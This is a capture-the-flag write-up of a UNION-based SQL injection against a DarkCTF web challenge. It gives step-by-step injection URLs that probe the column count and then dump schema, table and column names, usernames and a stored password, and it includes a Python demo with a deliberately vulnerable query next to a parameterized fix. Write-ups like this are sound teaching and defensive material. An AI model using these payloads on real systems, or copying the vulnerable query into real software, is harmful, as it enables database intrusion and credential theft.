###### tags: `DarkCTF` `Web`

# Web/So_Simple

http://web.darkarmy.xyz:30001

### description

- "Try Harder" may be You get flag manually
- Try id as parameter
- LINK: http://web.darkarmy.xyz:30001

### solution

- After connecting, first test the number of columns in the query:
  - `http://web.darkarmy.xyz:30001/?id=8'union select 1,2 -- -`
  - ![](https://i.imgur.com/jbeQMuj.png)
  - `http://web.darkarmy.xyz:30001/?id=8'union select 1,2,3 -- -`
  - Once the UNION SELECT reaches 3 columns the error disappears, so the query has 3 columns.
  - Further testing shows the three columns are named `username`, `password` and `id`.
  - ![](https://i.imgur.com/B7kLa3V.png)
- Dump the database names:
  - Database names are stored in `information_schema.schemata` by default.
  - `http://web.darkarmy.xyz:30001/?id='union select 1,2,group_concat(schema_name separator '~') from information_schema.schemata -- -`
  - ![](https://i.imgur.com/AnNRmOr.png)
- Dump the table names:
  - Tables are listed in `information_schema.tables`.
  - `http://web.darkarmy.xyz:30001/?id='union select 1,2,group_concat(table_name separator '~') from information_schema.tables where table_schema='id14831952_security' -- -`
- Dump the column names:
  - Columns are listed in `information_schema.columns`.
  - `http://web.darkarmy.xyz:30001/?id='union select 1,2,group_concat(column_name separator '~') from information_schema.columns where table_name='users' -- -`
- Pull the values out of the `username` column:
  - `http://web.darkarmy.xyz:30001/?id='union select 1,2,group_concat(username separator '~') from users -- -`
- Pull the remaining columns for the `flag` user:
  - `http://web.darkarmy.xyz:30001/?id='union select 1,password,id from users where username='flag`
  - ![](https://i.imgur.com/ncOsvoX.png)
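The bug class behind this challenge is an `id` parameter concatenated straight into the SQL text. The block below is an added example, not the challenge's own code: it reproduces the column-count probe from the writeup against an in-memory SQLite table with constructed sample rows (the real target ran MySQL, whose `information_schema` SQLite lacks), and places the vulnerable lookup next to the parameterized one that closes the hole. Function names and the sample data are this example's own.

```python
"""
Vulnerable vs. parameterized lookup for a `?id=` style endpoint.
Added example for the DarkCTF So_Simple writeup; uses SQLite in memory
with constructed data, not the challenge's database.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "constructed-pw-1"), (2, "flag", "constructed-fake-flag")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str):
    """The bug: untrusted input is spliced into the query text.

    Returns (rows, error_message). A UNION with the wrong column count
    raises a database error, which is exactly the signal the writeup's
    first two requests are probing for.
    """
    sql = f"SELECT id, username, password FROM users WHERE id='{user_id}'"
    try:
        return conn.execute(sql).fetchall(), None
    except sqlite3.OperationalError as exc:
        return [], str(exc)


def lookup_safe(conn: sqlite3.Connection, user_id: str):
    """The fix: the value is bound as a parameter and never parsed as SQL,
    so quote characters and UNION keywords in it are just data."""
    sql = "SELECT id, username, password FROM users WHERE id=?"
    return conn.execute(sql, (user_id,)).fetchall(), None


if __name__ == "__main__":
    db = make_db()
    # The writeup's column-count probe, with 2 and then 3 columns.
    for payload in ("8' union select 1,2 -- -", "8' union select 1,2,3 -- -"):
        print("vulnerable:", payload, "->", lookup_vulnerable(db, payload))
        print("safe:      ", payload, "->", lookup_safe(db, payload))
```

Running it shows the vulnerable lookup erroring on the two-column UNION and returning the injected `(1, 2, 3)` row on the three-column one, while the parameterized version returns no rows for either payload and still finds a real user when given a plain id.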